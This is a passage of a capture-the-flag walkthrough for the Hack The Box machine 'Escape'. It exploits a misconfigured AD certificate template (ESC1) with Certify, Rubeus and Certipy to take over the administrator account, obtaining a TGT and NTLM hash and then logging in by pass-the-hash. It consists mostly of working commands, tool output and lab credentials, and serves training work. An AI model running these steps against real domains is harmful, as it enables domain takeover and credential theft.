ZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYBBQUHAQEE
gbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049
QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNv
bmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/
b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
AAOCAQEAHeC4ZJ9wx1f9rrF03eoILmsIIuRTrgsUc4WSi3CbQ7KaB/XCsKvWSaR0
evwozH27Nk4nvD3YXSTlAoF9UqGhF8rUacWbHWFu04yPS2DGNAHs/bKVSxKdC1xh
NEUjFYowe7NOMn+HdPOkxR8Dy3+xHLi0wZW5cEbo39xFljuGQiUu19a1q5gTzHJA
FmGXR30uCcVtb1pXi3gUj0Y2i25ZwDR7Gb7oE2kNST/QRPjx2l7aATnOElinDKOv
r2E5h25b/1ZXxFQF7dPL7m/39vAQEXKh9vK53Rr6Yt/rtY7so0HdEKY58vwbg3+S
Ns1arM4q6AuVLKS3Zpm0/XBW4AHPQQ==
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:14.2586605
We will copy everything from -----BEGIN RSA PRIVATE KEY-----
to -----END CERTIFICATE-----
into a file on my host and convert it to a .pfx
using the command given, entering no password when prompted:
└─$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
We will upload cert.pfx
, as well as a copy of Rubeus (downloaded from SharpCollection), and then run the asktgt
command, passing it the certificate to get a TGT as administrator:
*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> upload Rubeus.exe
*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> upload cert.pfx
*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> .\Rubeus.exe asktgt /user:administrator /certificate:C:\Users\Ryan.Cooper\documents\cert.pfx
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[*] Using domain controller: fe80::4962:1632:659d:e390%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : administrator
UserRealm : SEQUEL.HTB
StartTime : 10/12/2024 9:29:40 AM
EndTime : 10/12/2024 7:29:40 PM
RenewTill : 10/19/2024 9:29:40 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : BKBLFIk+E1K8gzVRsHTH7A==
ASREP (key) : 85742085636725858D930F1414606557
It works! However, Rubeus tries to load the returned ticket directly into the current session, so in theory, once we run this we could just enter administrator’s folders and get the flag. However, this doesn’t work on Evil-WinRM.
Instead, we are going to run the same command with /getcredentials /show /nowrap
. This will do the same thing, and try to dump credential information about the account:
*Evil-WinRM* PS C:\Users\Ryan.Cooper\documents> .\Rubeus.exe asktgt /user:administrator /certificate:C:\Users\Ryan.Cooper\documents\cert.pfx /getcredentials /show /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[*] Using domain controller: fe80::4962:1632:659d:e390%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : administrator
UserRealm : SEQUEL.HTB
StartTime : 10/12/2024 9:31:26 AM
EndTime : 10/12/2024 7:31:26 PM
RenewTill : 10/19/2024 9:31:26 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : DIAHQIuZHSEZlbQBDkLc+A==
ASREP (key) : 110909A97E0152C6912DECA81DCFBE8F
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EE
The last line is the NTLM hash for the administrator account.
An alternative tool to accomplish the same thing is Certipy, which is nice because I can run it remotely from my VM. It has a find
command that will identify the vulnerable template:
(Install Certipy by running)
└─$ sudo apt install pipx
└─$ pipx install certipy-ad
└─$ certipy find -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -text -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC-CA
DNS Name : dc.sequel.htb
Certificate Subject : CN=sequel-DC-CA, DC=sequel, DC=htb
Certificate Serial Number : 1EF2FA9A7E6EADAD4F5382F4CE283101
Certificate Validity Start : 2022-11-18 20:58:46+00:00
Certificate Validity End : 2121-11-18 21:08:46+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 10 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Administrator
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
And req
allows us to get the .pfx
certificate just like what we did with Certify.exe
and openssl
above:
└─$ certipy req -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -upn administrator@sequel.htb -ca sequel-dc-ca -template UserAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 15
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
The auth
command will take that certificate (administrator.pfx
) and get the hash.
└─$ certipy auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
I noted above that there was an eight hour different in clock times. I can sync the clock with Escape using ntpdate
:
└─$ sudo ntpdate -u sequel.htb
2024-10-12 12:43:01.268731 (-0400) +28800.405648 +/- 0.095215 sequel.htb 10.129.228.253 s1 no-leap
CLOCK: time stepped by 28800.405648
Now we can dump the hash:
└─$ certipy auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
We can now connect to DC using Evil-WinRm using the NTLM hash of administrator:
└─$ evil-winrm -i 10.129.228.253 -u administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
We can get root.txt
on Administrator’s Desktop
cat r*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
0bb099b417e05141ed88932a9a14c558
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : dc
Primary Dns Suffix . . . . . . . : sequel.htb
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : sequel.htb
.htb
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
Physical Address. . . . . . . . . : 00-50-56-B9-7A-DD
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : dead:beef::4962:1632:659d:e390(Preferred)
Link-local IPv6 Address . . . . . : fe80::4962:1632:659d:e390%4(Preferred)
IPv4 Address. . . . . . . . . . . : 10.129.228.253(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Lease Obtained. . . . . . . . . . : Saturday, October 12, 2024 8:01:29 AM
Lease Expires . . . . . . . . . . : Saturday, October 12, 2024 10:31:29 AM
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:acf1%4
10.129.0.1
DHCP Server . . . . . . . . . . . : 10.129.0.1
DHCPv6 IAID . . . . . . . . . . . : 251678806
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-88-DA-51-00-0C-29-37-43-59
DNS Servers . . . . . . . . . . . : 127.0.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled
References
- https://0xdf.gitlab.io/2023/06/17/htb-escape.html
- https://github.com/ly4k/Certipy
- https://github.com/GhostPack/Certify
- https://github.com/Flangvik/SharpCollection/tree/master/NetFramework_4.7_Any